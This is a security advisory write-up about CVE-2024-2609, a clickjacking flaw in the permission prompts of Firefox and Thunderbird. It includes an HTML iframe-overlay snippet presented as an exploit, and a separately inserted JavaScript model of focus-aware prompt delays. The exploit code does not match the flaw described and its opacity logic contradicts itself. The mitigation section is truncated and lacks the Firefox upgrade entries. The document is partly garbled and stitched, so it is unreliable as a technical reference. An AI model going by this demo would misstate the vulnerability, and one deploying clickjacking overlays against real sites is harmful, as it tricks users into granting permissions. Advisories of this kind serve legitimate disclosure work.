Summary

A new vulnerability (CVE-2024-2609) has been discovered in Firefox, Firefox ESR, and Thunderbird: the permission prompt input delay could expire while the window is not in focus. This leaves the prompt vulnerable to clickjacking by malicious websites, potentially allowing unauthorized access to sensitive information or control over the affected software. The vulnerability affects Firefox versions earlier than 124, Firefox ESR versions earlier than 115.10, and Thunderbird versions earlier than 115.10.

Details and Exploitation

Clickjacking, or "UI Redress Attack," is a well-known malicious technique that tricks users into clicking on hidden elements by overlaying them on top of seemingly legitimate UI components. This can result in unwanted actions being performed on the user's behalf, without their consent or knowledge.

In the case of CVE-2024-2609, the issue stems from a flaw in how the permission prompt input delay is managed. When a permission prompt appears, the software applies an input delay to prevent accidental clicks. However, this input delay could expire even when the window is not in focus, making the prompt susceptible to clickjacking.
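The focus handling described above can be modelled in a few lines. This is an added example, not Firefox code and not part of the original write-up: the class name `PromptDelay`, the 500 ms delay and the timeline are assumptions made for illustration, and restarting the delay when focus returns is one way to harden it, not necessarily how Mozilla fixed it.

```javascript
// Simplified model of a permission-prompt input delay (not Firefox source).
// Times are plain millisecond numbers so the logic can be checked offline.
const DELAY_MS = 500; // constructed value for this example

class PromptDelay {
  constructor(focusAware) {
    this.focusAware = focusAware; // false = flawed behaviour, true = hardened
    this.focused = true;
    this.armedAt = null; // moment the delay last (re)started
  }

  show(now, windowFocused) {
    this.focused = windowFocused;
    this.armedAt = now;
  }

  onBlur() {
    this.focused = false;
  }

  onFocus(now) {
    this.focused = true;
    // Hardened: regaining focus restarts the delay, so the user always gets
    // a full DELAY_MS with the prompt actually in front of them.
    if (this.focusAware) this.armedAt = now;
  }

  acceptsClick(now) {
    if (this.armedAt === null) return false;
    const elapsed = now - this.armedAt;
    if (!this.focusAware) return elapsed >= DELAY_MS; // timer ran while unfocused
    return this.focused && elapsed >= DELAY_MS;
  }
}

// Constructed timeline: the prompt opens at t=0 in an unfocused window, the
// window gains focus at t=2000, and a click lands 50 ms later.
function clickAcceptedAfterRefocus(focusAware) {
  const p = new PromptDelay(focusAware);
  p.show(0, false);
  p.onFocus(2000);
  return p.acceptsClick(2050);
}

console.log("flawed:", clickAcceptedAfterRefocus(false)); // true
console.log("hardened:", clickAcceptedAfterRefocus(true)); // false
```

In the flawed model the click 50 ms after focus is accepted because the delay already ran out while the window was in the background; the focus-aware model rejects it until a full delay has passed in the foreground.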

Here's a sample code snippet demonstrating the exploit:

<!DOCTYPE html>
<html>
  <head>
    <style>
      iframe {
        position: absolute;
        left: 70px;
        top: 70px;
      }

      div {
        position: absolute;
        left: 50px;
        top: 50px;
      }
    </style>
  </head>
  <body>
    <iframe src="https://legitimate.example.com" width="500" height="500" id="controlled"></iframe>
    <div><button onclick="performExploit();" id="clickme">Click Me</button></div>
    <script>
      const frame = document.getElementById("controlled");

      function performExploit() {
        frame.src = "https://malicious.example.com";
        frame.style.opacity = 0;
      }

      frame.onload = function () {
        frame.style.opacity = 1;
      };
    </script>
  </body>
</html>

In the above example, a malicious website manipulates the user into clicking a button that loads a legitimate website with a permission prompt in an iframe. By changing the opacity of the iframe to 0, the malicious website can overlay the legitimate page and trick the user into clicking the now-invisible permission prompt.

The CVE-2024-2609 vulnerability has been reported in the following security advisory pages:

- Mozilla Security Advisory: MFSA2024-29
- National Vulnerability Database (NVD) - CVE-2024-2609

Thunderbird: Upgrade to version 115.10 or later

These updates can be found on the official Mozilla Firefox and Mozilla Thunderbird websites.

Users can also employ browser add-ons or extensions that aim to protect against clickjacking attacks, such as the NoScript Security Suite for Firefox.

In summary, updating the affected software to the latest versions will help mitigate the CVE-2024-2609 vulnerability, reducing the risk of potential clickjacking exploits and providing a more secure browsing experience.

Timeline

Published on: 03/19/2024 12:15:08 UTC
Last modified on: 08/28/2024 15:35:21 UTC